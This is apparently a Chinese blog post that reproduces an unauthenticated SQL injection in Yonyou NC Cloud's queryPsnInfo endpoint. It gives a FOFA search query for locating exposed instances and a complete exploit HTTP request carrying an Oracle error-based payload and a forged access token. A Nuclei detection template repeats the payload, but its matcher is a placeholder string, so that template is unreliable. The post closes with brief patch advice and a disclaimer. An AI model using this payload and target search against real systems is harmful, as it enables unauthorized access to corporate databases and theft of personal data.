【漏洞复现】用友NC Cloud系统queryPsnInfo接口SQL注入

于 2024-08-05 19:20:27 发布
阅读量318 收藏 3
点赞数 6
分类专栏: 漏洞复现 文章标签: 漏洞复现 威胁情报 SQL注入 用友 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/140934754
版权

文章目录

0x00 漏洞描述

用友NC Cloud存是一款大型企业数字化平台。
在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。

影响范围

尚不明确

0x01 测绘工具

FOFA:app=“用友-NC-Cloud”
在这里插入图片描述
在这里插入图片描述

0x02 漏洞复现

GET /ncchr/pm/obj/queryPsnInfo?staffid=1%27+AND+1754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281754%3D1754%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+Nzkh HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

在这里插入图片描述

0x03 Nuclei检测脚本

id: 用友NC Cloud系统queryPsnInfo接口SQL注入

info:
  name: 用友NC Cloud系统queryPsnInfo接口SQL注入
  author: admin
  severity: high
  description: 攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。
  tags: oracle,sql,injection,timing

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ncchr/pm/obj/queryPsnInfo?staffid=1'%20AND%201754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281754%3D1754%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--%20Nzkh"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
      Accept: text/html, image/gif, image/jpeg, */*; q=.2, */*; q=.2
      Connection: close

    matchers:
      - type: word
        words:
          - "expected-result" 

    extractors:
      - type: regex
        regex:
          - "未知的主机"

0x04 修复建议

官方已发布升级补丁包,支持在线升级和离线补丁安装
使用WAF等设备对 /ncchr/pm/obj/queryPsnInfo 接口进行拦截

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

An0nymouer
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友NC-Cloud系统queryPsnInfo接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-04 136
用友NC-Cloud系统 queryPsnlnfo接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友NC Cloud runScript SQL注入漏洞复现
0xSec
03-20 643
用友NCCloud /ncchr/attendScript/internal/runScript接口处存在SQL注入漏洞,未授权的攻击者可以通过此漏洞获取数据库权限,进一步利用可导致服务器失陷。
漏洞复现用友NC-Cloud系统queryStaffByName存在SQL注入漏洞
qq_34780861的博客
04-02 321
NC Cloud用友推出的大型企业数字化平台。用友NC-Cloud系统queryStaffByName存在SQL注入漏洞
漏洞复现用友NC Cloud-runScript-SQL注入漏洞
Nday_Seeker
03-20 925
用友NC Cloud系统中的runScript接口被发现存在SQL注入(SQL Injection)安全漏洞。攻击者通过构造恶意的输入数据,能够将非法的SQL命令插入到原本正常的数据库查询语句中,从而绕过授权机制,未经授权地直接访问、修改或删除数据库中的敏感信息。
漏洞复现用友U8 Cloud MeasQueryConditionFrameAction SQL注入漏洞
siu~
07-12 990
用友U8 Cloud MeasQueryConditionFrameAction接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现用友NC Cloud 存在SQL注入
KKleeeaa的博客
03-25 247
的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。声明:亲爱的读者,我们诚挚地提醒您,Aniya。0x01FOFA语句。0x02 漏洞POC。
用友-nc-cloud runscript接口sql注入漏洞
weixin_43567873的博客
03-20 285
用友-nc-cloud runscript接口sql注入漏洞
漏洞复现用友-NC-Cloud-runScript-sql注入
知黑而守白
03-19 151
​​​​NC Cloud用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。NC Cloud完全基于云原生架构,技术先进、性能稳定、自主安全可控,支撑大中型以及超大型集团企业N层多site混合云部署方案,支持整个系统高可用、弹性扩展、双/多活,以及快速灾备恢复能力等。用友NC Cloud系统 runScript 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
用友NC Cloud queryPsnInfo SQL注入漏洞复现
0xSec
08-03 186
用友NC Cloud queryPsnInfo 接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
NC Cloud技术文档及OpenAPI案例文档
03-09
NC Cloud技术文档及OpenAPI案例文档
NC Cloud 2021.05 全产品培训 - 应收应付
06-01
NC Cloud 2021.05 全产品培训 - 应收应付】是针对用友NCcloud中关于应收应付模块的详细培训内容。这个模块涵盖了企业日常财务管理中的重要环节,包括收付单据处理、转移并账、协同管理、核销处理、坏账管理、催款...
用友NC接口解决方案
01-30
本案例中的接口是为了解决用友NC系统与西安热工院设备监理系统之间的数据同步问题。 - **系统环境**:该解决方案涉及的主要系统包括用友NC系统、西安热工院设备监理系统以及ESB(Enterprise Service Bus,企业服务...
用友NC65安装操作手册(自己编制)
10-13
用友NC65安装操作手册》是一份详尽的指南,主要针对想要自我学习和测试用友NC65的新手顾问。这份手册涵盖了从安装数据库到配置数据源的整个流程,同时也适用于其他高版本的NCC产品。下面将详细阐述其中的关键步骤...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
新闻阅读器.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
Windows Server 2008R2 sp1 升级 Service Pack 1
08-04
windows Server 2008 R2 Standard 升级 Service Pack 1 《Windows Server 2008 R2 SP1与IE11及依赖包详解》 Windows Server 2008 R2 SP1(Service Pack 1)是微软公司针对其服务器操作系统Windows Server 2008 R2的一个重要更新,旨在增强系统性能、提升安全性,并修复了大量已知问题。SP1的引入,不仅包含了自Windows Server 2008 R2发布以来的所有累积更新,还提供了对新技术的支持,例如Hyper-V 3.0虚拟化技术,提高了云计算和数据中心的管理效率。 IE11(Internet Explorer 11)是微软推出的最后一个版本的传统IE浏览器,对于Windows Server 2008 R2 SP1来说,这是一个重要的升级。IE11带来了更快的网页加载速度、更好的标准支持以及增强的安全特性。它支持HTML5、CSS3等现代Web技术,提供了更好的用户体验,并且增强了对企业级应用的兼容性。
基于python的crazy管理系统 (5).zip
最新发布
08-04
安装包
用友nccloud系统架构
06-02
用友NC Cloud 是一种基于云计算的企业级应用软件,它的系统架构可以简单地分为前端、中间件和后端三个层次。 前端主要是指用户通过浏览器或客户端等方式访问用友NC Cloud 系统,进行数据录入、查询等操作。用友NC Cloud 的前端采用了前后端分离的方式,前端是一个基于 Vue.js 框架的单页面应用程序,通过 RESTful API 与后端交互。 中间件主要是指用友NC Cloud 的业务逻辑处理层,它包含了应用服务器、消息队列、缓存服务、搜索引擎等多个组件,用于处理各种业务流程和数据操作。用友NC Cloud 的中间件采用了微服务架构,每个组件都运行在独立的容器中,各个组件之间通过 RESTful API 或消息队列进行通信。 后端主要是指用友NC Cloud 的数据存储层,它包含了数据库、文件存储、对象存储等多个组件。用友NC Cloud 的后端采用了分布式存储架构,通过数据库的读写分离和数据分片技术来提高系统的性能和可伸缩性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值